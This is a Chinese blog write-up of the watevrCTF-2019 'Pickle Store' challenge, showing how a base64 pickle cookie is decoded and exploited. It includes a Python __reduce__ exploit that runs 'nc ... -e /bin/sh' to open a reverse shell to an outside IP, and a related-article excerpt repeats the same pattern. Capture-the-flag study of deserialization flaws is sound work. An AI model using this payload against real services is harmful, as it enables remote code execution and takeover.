[watevrCTF-2019]Pickle Store

最新推荐文章于 2024-02-06 10:06:01 发布
最新推荐文章于 2024-02-06 10:06:01 发布
阅读量460 收藏
点赞数 1
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/SopRomeo/article/details/108290583
版权

在这里插入图片描述

买腌黄瓜

抓包看下,发现cookie的加密方式有点熟悉
在这里插入图片描述
base64解密

在这里插入图片描述

应该是basse64加某种特殊的加密
看到了题目名字
Python 有个pickle库
那应该是个反序列化漏洞了

这个序列化漏洞,详解之前国赛的题目发过一个链接,就不发了
这个序列化看好多脚本都是python2 做的,可以去kali下用脚本

将cookie loads一下
在这里插入图片描述
但是这题并不是要我们买那个1000出flag
而是需要弹shell

由此构造exp,注意在linux环境下运行

import base64
import pickle

class A(object):
    def __reduce__(self):
        return (eval, ("__import__('os').system('nc 174.0.131.29 2333 -e/bin/sh')",))
a = A()
print(base64.b64encode(pickle.dumps(a)))

将生产的payload放入cookie
nc 监听
在这里插入图片描述

penson by 小乌
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
juice-shop-ctf:OWASP Juice Shop的标志捕获(CTF)环境设置工具
04-30
OWASP果汁商店CTF扩展 Node包可以帮助您准备针对不同流行CTF框架的挑战的事件。 此交互式实用程序使您可以在几分钟内填充CTF游戏服务器。 支持的CTF框架 juice-shop-ctf-cli支持以下开源CTF框架: 特遣部队 基金会 根盒子 设置 npm install -g juice-shop-ctf-cli 用法 互动模式 打开命令行并运行: juice-shop-ctf 然后按照交互式命令行工具的说明进行操作。 配置文件 除了在CLI中回答问题外,您还可以在具有以下格式的文件中提供所需的配置: ctfFramework : CTFd | FBCTF | RootTheBox juiceShopUrl : https://juice-shop.herokuapp.com ctfKey : https://raw.githubusercon
The-windows-pickle-login-tkinter-python-project
08-11
The-windows-pickle-login-tkinter-python-project Python的标准TK GUI工具包的接口Tkinter模块(“TK界面”)是Python的标准TK GUI工具包的接口。 TK和Tkinter可以用于大多数UNIX平台,也可以应用于windows和麦金塔系统。tk8.0的后续版本可以通过TTK实现本地窗口样式,并且在大多数平台上都运行良好。此外,Tkinter Tix还提供了更丰富的窗口组件。 这个项目将使用Tkinter库来实现用户注册和登录。
[watevrCTF-2019]Cookie Store
qq_43801002的博客
08-04 1018
题目 过程 1.三张图片,结合题目,估计是要抓包看cookie,试一下。 购买食物一 左边cookie 右边cookie 2.很明显少了1。那将id=0改为id=2购买食物三试试,购买失败,钱不够。修改cookie,base64转码,放到发送包里面。500。那将id=0改为id=2购买食物三试试,购买失败,钱不够。修改cookie,base64转码,放到发送包里面。500。那将id=0改为id=2购买食物三试试,购买失败,钱不够。修改cookie,base64转码,放到发送包里面。500 3.b
NSSCTF 刷题记录
红叶的博客
03-07 862
本篇文章主要写几个值得记一笔的题目,其他题目都是类似换皮。
python反序列化-[watevrCTF-2019]Pickle Store
snowlyzz的博客
09-01 821
详细讲解pickle
BUUCTF:[watevrCTF-2019]Pickle Store
末初的CSDN博客
07-26 1117
题目地址:https://buuoj.cn/challenges#[watevrCTF-2019]Pickle%20Store Pickle反序列化 使用pickle.loads()和base64对这串字符进行解码反序列化 利用Pickle反序列化exp反弹shell 在Buu的小号上开一台内网靶机 import base64 import pickle class A(object): def __reduce__(self): return (eval, ("__imp
[watevrCTF-2019]Cookie Store 1
zzf011900的博客
11-07 180
可以看到这个我们改一下钱的位置就可以 直接就base64解码出现的是{"money": 49, "history": []} 然后我们把49的位置就直接改成一百以上在编写成base64码,编号的码写在cookie的位置就可以了。因为一打开可以看到要买一百的饼干但是只有五十块所以先买一个曲奇去网络里面看看怎么事。我的做完了所以flag已经出来了但是不影响。启动靶场打开链接会出现下面的界面。
[watevrCTF-2019]Pickle StorePickle反序列化】
D.MIND 的博客
04-29 1580
文章目录Pickle反序列化简单字符类型的反序列化类的反序列化`__reduce__`命令行下输入命令:python下反弹shell一、curl+base64二、curl -d三、nc 反弹shell 一进来看看Cookie处,果然又是一个session gAN9cQAoWAUAAABtb25leXEBTfQBWAcAAABoaXN0b3J5cQJdcQNYEAAAAGFudGlfdGFtcGVyX2htYWNxBFggAAAAYWExYmE0ZGU1NTA0OGNmMjBlMGE3YTYzYjdmOGVi
python-turtle模块-pickle模块-密码程序-可更改或设置密码
02-08
原创python密码程序 知识领域: turtle模块-输入框 pickle模块-保存数据至txt文本文档 密码程序 可从Set_password.py更改密码 从Password.py运行 如有雷同纯属巧合
project-pickle
05-23
泡菜项目 这将使您的项目不那么麻烦!
python-pickle-shelve
02-12
python-pickle-shelve
data-table.pickle
05-08
data_table.pickle
【Web】小白也能看懂的BeginCTF个人wp(全)
uuzeray的博客
02-06 2467
纯萌新,贴出自己的wp,一起交流学习QWQ。
渗透第一个靶机 shop1.0 (还是简单渗透版)
yangtailang94666的博客
09-27 2011
环境:win7虚拟机 渗透工具 : burpsuite 和菜刀 shop 1.0 通过一些后台字典,简简单单找到了该网站的后台找到。 下一步,进入以管理员身份渗透进入该系统,,使用burpsuit进行暴力破解,或者使用sql注入, 此处使用sql注入来解决。 算了 此处多写一点。 解决一下找后台问题。有些后台会进行隐藏,并不是简单的/admin /logind等 而且网站开发语言也不一样,可能是php也可能是asp 就所以后缀就很复杂,所以就需要使用一些后台扫描工具...
beginCTF 2024 Web方向题解WP 全
最新发布
Jay17的博客
02-06 1619
beginCTF 2024 Web方向题解WP 全
BeginCTF2024 wp web&&misc
永不落的梦想
02-06 1105
php反序列化,源码如下;B::__destruct()作为开头,调用A不存在的变量,触发A::__get(),调用Fun不存在的方法,触发__call的回调函数执行phpinfo,flag在phpinfo中;
python读取txt文件写入失败-写入Pickle文件时出现FileNotFoundError - python
06-10
另外,如果你正在尝试写入pickle文件,并且该文件不存在,则会出现FileNotFoundError。确保你已经创建了该文件,或者在代码中使用“w+”模式来创建文件。 以下是一个简单的示例代码,用于读取txt文件并将其写入...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值